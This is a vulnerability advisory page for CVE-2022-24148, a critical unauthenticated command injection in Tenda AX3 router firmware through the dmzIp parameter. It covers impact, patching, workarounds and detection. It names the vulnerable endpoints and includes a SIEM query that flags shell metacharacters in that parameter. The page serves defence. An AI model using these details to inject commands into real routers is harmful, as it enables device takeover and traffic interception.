CVE-2022-24148 – CVE-2022-24148 is a critical command injection ... (How to Fix)

Q: What is the severity of CVE-2022-24148?

CVE-2022-24148 has a CVSS score of 9.8 (CRITICAL). CVE-2022-24148 is a critical command injection vulnerability in Tenda AX3 routers that allows attackers to execute arbitrary system commands via the dmzIp parameter in the mDMZSetCfg function. This affects Tenda AX3 router users running vulnerable firmware versions, potentially giving attackers full control of the device. The vulnerability is remotely exploitable without authentication.

📋 TL;DR

CVE-2022-24148 is a critical command injection vulnerability in Tenda AX3 routers that allows attackers to execute arbitrary system commands via the dmzIp parameter in the mDMZSetCfg function. This affects Tenda AX3 router users running vulnerable firmware versions, potentially giving attackers full control of the device. The vulnerability is remotely exploitable without authentication.

💻 Affected Systems

Products:

Tenda AX3

Versions: v16.03.12.10_CN

Operating Systems: Embedded Linux (router firmware)

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects the specific Chinese firmware version. Other regional versions may be unaffected.

📦 What is this software?

Ax3 Firmware by Tenda

View all CVEs affecting Ax3 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to install persistent backdoors, intercept all network traffic, pivot to internal network devices, and use the router as part of a botnet.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential theft from network traffic, and installation of malware on connected devices.

🟢

If Mitigated

Limited impact if network segmentation isolates the router and strict firewall rules prevent external access to management interfaces.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable without authentication and affects internet-facing routers.

🏢 Internal Only: MEDIUM - Internal attackers could exploit this if they gain network access, but requires specific targeting.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Proof-of-concept code is publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation vectors.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Later versions than v16.03.12.10_CN

Vendor Advisory: Not publicly documented by Tenda

Restart Required: Yes

Instructions:

1. Log into router admin interface. 2. Navigate to firmware update section. 3. Download latest firmware from Tenda website. 4. Upload and install firmware update. 5. Reboot router after installation.

🔧 Temporary Workarounds

Disable DMZ functionality

all

Disable the DMZ feature that contains the vulnerable function

Restrict management interface access

all

Configure firewall to only allow management interface access from trusted IP addresses

🧯 If You Can't Patch

Replace affected router with a different model or vendor
Isolate router in separate VLAN with strict firewall rules preventing access to management interface

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface. If version is exactly v16.03.12.10_CN, the device is vulnerable.

Check Version:

Check via router web interface at 192.168.0.1 or 192.168.1.1, or use 'curl http://router-ip/goform/getStatus' if available

Verify Fix Applied:

Verify firmware version has been updated to a version higher than v16.03.12.10_CN

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /goform/setDMZ
Commands with shell metacharacters in dmzIp parameter
Unexpected system processes spawned from router

Network Indicators:

Unusual outbound connections from router
DNS queries to suspicious domains
Unexpected SSH/Telnet connections originating from router

SIEM Query:

source="router_logs" AND (uri="/goform/setDMZ" OR uri="/goform/mDMZSetCfg") AND (dmzIp CONTAINS "|" OR dmzIp CONTAINS ";" OR dmzIp CONTAINS "`")

📊 Metadata

CVE ID: CVE-2022-24148

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-77

Published: February 4, 2022

Last Updated: November 21, 2024

🔗 References

https://github.com/pjqwudi/my_vuln/blob/main/Tenda/vuln_14/14.md Broken Link,Exploit,Third Party Advisory
https://github.com/pjqwudi/my_vuln/blob/main/Tenda/vuln_14/14.md Broken Link,Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-24148, you might also want to check these: